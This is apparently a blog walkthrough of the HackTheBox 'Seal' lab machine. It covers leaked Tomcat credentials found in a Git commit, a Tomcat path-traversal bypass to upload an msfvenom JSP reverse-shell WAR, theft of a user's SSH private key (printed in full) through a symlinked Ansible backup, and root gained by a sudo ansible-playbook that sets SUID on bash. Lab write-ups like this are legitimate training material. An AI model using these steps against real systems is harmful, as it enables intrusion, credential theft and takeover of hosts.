Seal Hackthebox Detailled Writeup


DIFFICULTY LEVEL

OS = LINUX

INITIAL-SHELL = EASY

USER = DIFFICULT 

ROOT = PRETTY EASY

NMAP

I am always starting with Nmap

 # Nmap 7.91 scan initiated Sun Jul 11 09:36:44 2021 as: nmap -sV -sC -vv -Pn -oN nmap 10.10.10.250  
 Nmap scan report for 10.10.10.250  
 Host is up, received user-set (0.19s latency).  
 Scanned at 2021-07-11 09:36:46 IST for 44s  
 Not shown: 997 closed ports  
 Reason: 997 resets  
 PORT   STATE SERVICE  REASON     VERSION  
 22/tcp  open ssh    syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |  3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)  
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC1FohcrXkoPYUOtmzAh5PlCU2H0+sFcGl6XXS6vX2lLJ3RD2Vd+KlcYtc2wQLjcYJhkFe793jmkogOSh0uI+fKQA9z1Ib3J0vtsIaNkXxvSMPcr54QxXgg1guaM1OQl43ePUADXnB6WqAg8QyF6Nxoa18vboOAu3a8Wn9Qf9iCpoU93d5zQj+FsBKVaDs3zuJkUBRfjsqq7rEMpxqCfkFIeUrJF9MBsQhgsEVUbo1zicWG32m49PgDbKr9yE3lPsV9K4b9ugNQ3zwWW5a1OpOs+r3AxFcu2q65N2znV3/p41ul9+fWXo9pm0jJPJ3V5gZphDkXVZEw16K2hcgQcQJUH7luaVTRpzqDxXaiK/8wChtMXEUjFQKL6snEskkRxCg+uLO6HjI19dJ7sTBUkjdMK58TM5RmK8EO1VvbCAAdlMs8G064pSFKxY/iQjp7VWuaqBUetpplESpIe6Bz+tOyTJ8ZyhkJimFG80iHoKWYI2TOa5FdlXod1NvTIkCLD2U=  
 |  256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)  
 | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD+SiHX7ZTaXWFgBUKSVlFmMYtqF7Ihjfdc51aEdxFdB3xnRWVYSJd2JhOX1k/9V62eZMhR/4Lc8pJWQJHdSA/c=  
 |  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)  
 |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXLlJgua8pjAw5NcWgGDwXoASfUOqUlpeQxd66seKyT  
 443/tcp open ssl/http  syn-ack ttl 63 nginx 1.18.0 (Ubuntu)  
 | http-methods:   
 |_ Supported Methods: OPTIONS GET HEAD POST  
 |_http-server-header: nginx/1.18.0 (Ubuntu)  
 |_http-title: Seal Market  
 | ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK/localityName=Hackney/emailAddress=admin@seal.htb/organizationalUnitName=Infra  
 | Issuer: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK/localityName=hackney/emailAddress=admin@seal.htb/organizationalUnitName=Infra  
 | Public Key type: rsa  
 | Public Key bits: 2048  
 | Signature Algorithm: sha256WithRSAEncryption  
 | Not valid before: 2021-05-05T10:24:03  
 | Not valid after: 2022-05-05T10:24:03  
 | MD5:  9c4f 991a bb97 192c df5a c513 057d 4d21  
 | SHA-1: 0de4 6873 0ab7 3f90 c317 0f7b 872f 155b 305e 54ef  
 | -----BEGIN CERTIFICATE-----  
 | MIIDiDCCAnACAWQwDQYJKoZIhvcNAQELBQAwgYkxCzAJBgNVBAYTAlVLMQ8wDQYD  
 | VQQIDAZMb25kb24xEDAOBgNVBAcMB2hhY2tuZXkxFTATBgNVBAoMDFNlYWwgUHZ0  
 | IEx0ZDEOMAwGA1UECwwFSW5mcmExETAPBgNVBAMMCHNlYWwuaHRiMR0wGwYJKoZI  
 | hvcNAQkBFg5hZG1pbkBzZWFsLmh0YjAeFw0yMTA1MDUxMDI0MDNaFw0yMjA1MDUx  
 | MDI0MDNaMIGJMQswCQYDVQQGEwJVSzEPMA0GA1UECAwGTG9uZG9uMRAwDgYDVQQH  
 | DAdIYWNrbmV5MRUwEwYDVQQKDAxTZWFsIFB2dCBMdGQxDjAMBgNVBAsMBUluZnJh  
 | MREwDwYDVQQDDAhzZWFsLmh0YjEdMBsGCSqGSIb3DQEJARYOYWRtaW5Ac2VhbC5o  
 | dGIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDafbynnscdjWeuXTrD  
 | M36rTJ0y2pJpDDFe9ngryz/xw1KsoPfEDrDE0XHc8LVlD9cxXd/8+0feeV34d63s  
 | YyZ0t5tHlAKw1h9TEa/og1yR1MyxZRf+K/wcX+OwXYFtMHkXCZFH7TPXLKtCrMJM  
 | Z6GCt3f1ccrI10D+/dMo7eyQJsat/1e+6PgrTWRxImcjOCDOZ1+mlfSkvmr5TUBW  
 | SU3uil2Qo5Kj9YLCPisjKpVuyhHU6zZ5KuBXkudaPS0LuWQW1LTMyJzlRfoIi9J7  
 | E2uUQglrTKKyd3g4BhWUABbwyxoj2WBbgvVIdCGmg6l8JPRZXwdLaPZ/FbHEQ47n  
 | YpmtAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAJZGFznhRSEa2DTgevXl1T8uxpiG  
 | PPd9R0whiIv3s225ir9SWW3Hl1tVkEY75G4PJA/DxmBIHxIK1OU8kZMuJUevnSIC  
 | rK16b9Y5Y1JEnaQwfKCoQILMU40ED76ZIJigGqAoniGCim/mwR1F1r1g63oUttDT  
 | aGLrpvN6XVkqSszpxTMMHk3SqwNaKzsaPKWPGuEbj9GGntRo1ysqZfBttgUMFIzl  
 | 7un7bBMIn+SPFosNGBmXIU9eyR7zG+TmpGYvTgsw0ZJqZL9yQIcszJQZPV3HuLJ8  
 | 8srMeWYlzSS1SOWrohny4ov8jpMjWkbdnDNGRMXIUpapho1R82hyP7WEfwc=  
 |_-----END CERTIFICATE-----  
 | tls-alpn:   
 |_ http/1.1  
 | tls-nextprotoneg:   
 |_ http/1.1  
 8080/tcp open http-proxy syn-ack ttl 63  
 | fingerprint-strings:   
 |  FourOhFourRequest:   
 |   HTTP/1.1 401 Unauthorized  
 |   Date: Sun, 11 Jul 2021 04:08:15 GMT  
 |   Set-Cookie: JSESSIONID=node01oxumfnzyr60s1qvyhewweivpt51389.node0; Path=/; HttpOnly  
 |   Expires: Thu, 01 Jan 1970 00:00:00 GMT  
 |   Content-Type: text/html;charset=utf-8  
 |   Content-Length: 0  
 |  GetRequest:   
 |   HTTP/1.1 401 Unauthorized  
 |   Date: Sun, 11 Jul 2021 04:08:12 GMT  
 |   Set-Cookie: JSESSIONID=node0ebvtc1vw1437lrblzejfp3fv51387.node0; Path=/; HttpOnly  
 |   Expires: Thu, 01 Jan 1970 00:00:00 GMT  
 |   Content-Type: text/html;charset=utf-8  
 |   Content-Length: 0  
 |  HTTPOptions:   
 |   HTTP/1.1 200 OK  
 |   Date: Sun, 11 Jul 2021 04:08:13 GMT  
 |   Set-Cookie: JSESSIONID=node0u0dxtzin5jbf1ghz5nuihd3bi51388.node0; Path=/; HttpOnly  
 |   Expires: Thu, 01 Jan 1970 00:00:00 GMT  
 |   Content-Type: text/html;charset=utf-8  
 |   Allow: GET,HEAD,POST,OPTIONS  
 |   Content-Length: 0  
 |  RPCCheck:   
 |   HTTP/1.1 400 Illegal character OTEXT=0x80  
 |   Content-Type: text/html;charset=iso-8859-1  
 |   Content-Length: 71  
 |   Connection: close  
 |   <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>  
 |  RTSPRequest:   
 |   HTTP/1.1 505 Unknown Version  
 |   Content-Type: text/html;charset=iso-8859-1  
 |   Content-Length: 58  
 |   Connection: close  
 |   <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>  
 |  Socks4:   
 |   HTTP/1.1 400 Illegal character CNTL=0x4  
 |   Content-Type: text/html;charset=iso-8859-1  
 |   Content-Length: 69  
 |   Connection: close  
 |   <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>  
 |  Socks5:   
 |   HTTP/1.1 400 Illegal character CNTL=0x5  
 |   Content-Type: text/html;charset=iso-8859-1  
 |   Content-Length: 69  
 |   Connection: close  
 |_  <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>  
 | http-auth:   
 | HTTP/1.1 401 Unauthorized\x0D  
 |_ Server returned status 401 but no WWW-Authenticate header.  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  

 Woah! it gives huge output

 ENUMERATION

PORT 8080

http://seal.htb:8080/

seal.htb:8080 bitbucket login form

after I register an account in gitbucket



and then I find new user names



Alex and Luis

let start enumerate more gitbucket hurrah! we find tomcat username and password on this URL


http://seal.htb:8080/root/seal_market/commit/971f3aa3f0a0cc8aac12fd696d9631ca540f44c7




the user name is tomcat 

password is 42MrHBf*z8{Z%


I tried to log in via tomcat user in http://seal.htb:8080/ but it throws an error



so I tried to login other usernames like Alex and Luis,

Luis logged in this password :)


after long enum, I find nothing useful but its shows tomcat? okkk

lets enum other port 443(https://seal.htb/)

PORT 443




directory brute forcing


 ffuf -w /usr/share/dirb/wordlists/common.txt -u https://seal.htb/FUZZ -fc 403 -recursion              1 ⨯  
     /'___\ /'___\      /'___\      
     /\ \__/ /\ \__/ __ __ /\ \__/      
     \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
     \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
      \ \_\  \ \_\ \ \____/ \ \_\      
      \/_/  \/_/  \/___/  \/_/      
     v1.2.0-git  
 ________________________________________________  
  :: Method      : GET  
  :: URL       : https://seal.htb/FUZZ  
  :: Wordlist     : FUZZ: /usr/share/dirb/wordlists/common.txt  
  :: Follow redirects : false  
  :: Calibration   : false  
  :: Timeout     : 10  
  :: Threads     : 40  
  :: Matcher     : Response status: 200,204,301,302,307,401,403  
  :: Filter      : Response status: 403  
 ________________________________________________  
             [Status: 200, Size: 19736, Words: 7425, Lines: 519]  
 admin          [Status: 302, Size: 0, Words: 1, Lines: 1]  
 css           [Status: 302, Size: 0, Words: 1, Lines: 1]  
 ez           [Status: 302, Size: 0, Words: 1, Lines: 1]  
 host-manager      [Status: 302, Size: 0, Words: 1, Lines: 1]  
 icon          [Status: 302, Size: 0, Words: 1, Lines: 1]  
 images         [Status: 302, Size: 0, Words: 1, Lines: 1]  
 index.html       [Status: 200, Size: 19736, Words: 7425, Lines: 519]  
 js           [Status: 302, Size: 0, Words: 1, Lines: 1]  
 manager         [Status: 302, Size: 0, Words: 1, Lines: 1]  
 test          [Status: 302, Size: 0, Words: 1, Lines: 1]  
 :: Progress: [4614/4614] :: Job [1/1] :: 89 req/sec :: Duration: [0:01:00] :: Errors: 0 ::  

then after, 


after https://seal.htb/manager/FUZZ

 

tomcat login 

try to login via the same password before we found in git-bucket



logged in successfully


 

tomcat version 9.0.31 ,

after googled I found some potential vulnerabilities 

The first one is path-traversal-in 

the second one is re

 remote code execution won't work

but path traversal works perfectly



https://seal.htb/manager/status/..;/html

 



hurrah we can upload war type file ok

let's create a war rear shell via msfvenom then upload get a beautiful shell :)

 msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your-htb-ip> LPORT=9080 -f war -o rce.war  


upload your shell in that location(above in the screenshot) we didn't upload directly because we don't access this URL



 so we use path traversal vulnerability using burp

lets open burp intercept the requests upload the file via path-traversal vulnerability 


intercept request change like this




TRIGGER THE SHELL



got tomcat shell


HORIZONTAL PRIVILEGED ESCALATION

USER.TXT 

looking the what process is running 

ps -aux



    the .ansible directory in Luis home directory and there a process running as Luis probably a backup service



Exploit the Process

Steps to Exploit

cat /opt/backups/playbook/run.yml

 - hosts: localhost  
  tasks:  
  - name: Copy Files  
   synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes  
  - name: Server Backups  
   archive:  
    path: /opt/backups/files/  
    dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"  
  - name: Clean  
   file:  
    state: absent  
    path: /opt/backups/files/  

The interesting part of this thing is that it also copies the symlink as it has copy_links=yes. so this gave me an idea to create a symlink of a file or folder.
looking at the permission of the folder we have only read-only access to it


we have write access at /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

steps to becoming a user Luis

1:  ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads  
2:    
3:  ls /opt/backups/archives/  
4:    
5:  cp /opt/backups/archives/backup-2021-07-13-03:00:32.gz rsa.gz  
6:    
7:  gzip -kd rsa.gz  
8:    
9:  tar -xf rsa  
10:    
11:  cd dashboard  
12:    
13:  cd uploads  
14:    
15:  cd .ssh  
16:    
17:  cat id_rsa  
18:    
19:  < TRANSFER TO YOUR LOCAL MACHINE>  

 I am using to transfer python http.server you also can use Netcat

victim machine

python3 -m http.server 9091

our local machine

wget http://seal.htb:9091/id_rsa



USER : LUIS id_rsa

 -----BEGIN OPENSSH PRIVATE KEY-----  
 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  
 u8KqOiDVrwmFJRAAAACWx1aXNAc2VhbAE=  
 -----END OPENSSH PRIVATE KEY-----  

 chmod 600 id_rsa

ssh -i id_rsa luis@seal.htb


ROOT PRIVILEGED ESCALATION

sudo -l



Now we can see we can run the command ansible-playbook as root.

This was easier than the user part as it is just to create a bad yml file and make it run any command as root

for references

https://www.middlewareinventory.com/blog/ansible-command-examples/ 

what is playbook?

https://www.redhat.com/en/topics/automation/what-is-an-ansible-playbook

sakthi.yml file

 - hosts: localhost  
  tasks:  
  - name: test  
   command: "chmod +s /bin/bash"  

 and just run 

sudo ansible-playbook sakthi.yml

/bin/bash -p

it's pretty easy to compare to user part <)




3 Comments

  1. keep getting this error

    cp: cannot stat '/opt/backups/archives/backup-2021-07-13-03:00:32.gz': No such file or directory

    ReplyDelete
  2. getting this error now.


    gzip: backup-2021-07-21-03:55:34: Read-only file system

    ReplyDelete
  3. The .yml file gives me errors

    ERROR! no module/action detected in task.

    ReplyDelete

Post a Comment

Previous Post Next Post

Smartphones

Post ADS 1

Advertisement

Post ADS 1